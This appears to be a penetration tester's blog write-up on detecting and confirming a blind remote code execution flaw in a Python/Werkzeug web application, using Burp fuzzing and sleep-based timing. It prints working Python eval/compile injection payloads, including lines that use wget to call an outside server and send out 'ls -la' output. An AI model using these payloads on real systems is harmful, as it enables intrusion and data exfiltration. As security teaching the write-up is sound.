How i find Blind Remote Code Execution vulnerability
Introduction
In this post I am going to explain how to detect Blind RCE vulnerability and how it can be exploited, I have encountered this bug in one of my vulnerability assessment and penetration testing activity and taking the same as an example,
What is Blind RCE?
This vulnerability occurs when attacker can execute malicious code or commands on a target machine and the output of the command/code executed will not be displayed in the response. A best way to validate a Blind Remote Code Execution is to execute the sleep command and check if the application actually sleeps for a specified time before returning the response,
In first place application looks very simple, no fancy options are there to test.
Application have file download option; where you can download report in csv format.
So, I fire up web application testing tool “Burp Suite” and start intercepting requests and response, expecting that you already know the basic usage of Burp.
Everything looks normal, but one thing keens my attention is Python 2.7.13, application using werkzug.
Werkzug is “Web Server Gateway Interface”. It is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process one request.
I started with automated tests like brute forcing of parameters with different payload from my payload list and multiple fuzzing process which either blocking my ip address for few minutes, giving me an empty output with 200 or 404 response errors and sometime showing request time out 408 response errors. Then after sometime I got tied of same process and forged a request in such a way that have empty parameters and again got a 500 internal server error
Then I got an idea to create a chart for all the errors response I was getting w.r.t payload list. I took some time with the process and created full chart w.r.t payloads vs. errors then after sometime noticed all payloads related to python were showing 500 internal server errors and rest technologies like php, ASP .net, Ruby and Perl were showing 200(empty output) or 400 range errors. From this process I deduce that I have to focus more on python based payloads.
Now I collected all my 5–6 unique python based RCE Payloads and created a around 40–50 new payloads out of them with different type of encoding and waf bypass techniques.
And, used this list for fuzzing the same parameter with help of Burp Intruder.
Once test was finished I noticed some Payloads show 200(empty response) and 400 range response errors and some again showed 500 internal server errors. So I started analysis of 500 internal server errors response first and noticed all payloads with sleep function were showing delay in response.
Then I use burp repeater and tried to recreate the sleep function request via running python code injection RCE payloads with 5,10 & 15 sec sleep and I was getting the 5, 10 & 15 sec delayed response (you can see bottom right corner of burp suite), I sent few more request with different time delay and response come after specified time delay. Now I can control the response but the problem is when I try to run any command the application does not displayed command output in the response.
POC Code: eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
Now, I am sure that the application is vulnerable with RCE but we need proper POC, with time delay POC client will not going to pay my Coffee bills.
So, we can do this in two ways but both works only if server allows and make outbound connections.
1) Run ping command and capture ICMP request with tcpdump
2) Run python server and capture hit request
I used 2nd option and started my python server then run (command mention below) command and Boommmmm… we got hit
We can now execute Metasploit payload and get reverse shell but client not allow to execute any malicious code on server,
POC Code: eval(compile(“””for x in range(1):\n import os\n os.popen(r’wget http://vpsip.com:8000').read()""",'','single'))
Ok, we can solve this problem by redirecting command output into file, so I wrote a simple php script which open a txt file and write command output into file, looks good, let’s check it
Time to check final
POC Code: eval(compile(“””for x in range(1):\n import os\n os.popen(r’wget http://vpsip.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))
Voila..!!! Everything work perfectly and we got command output on text file.
Final POC done!!! Mission Accomplished
Thanks to my Team: Raghav Bisht Deepankar Arora
Happy Hacking!
Tool I used: https://portswigger.net/burp/communitydownload
https://portswigger.net/web-security/os-command-injection
https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection
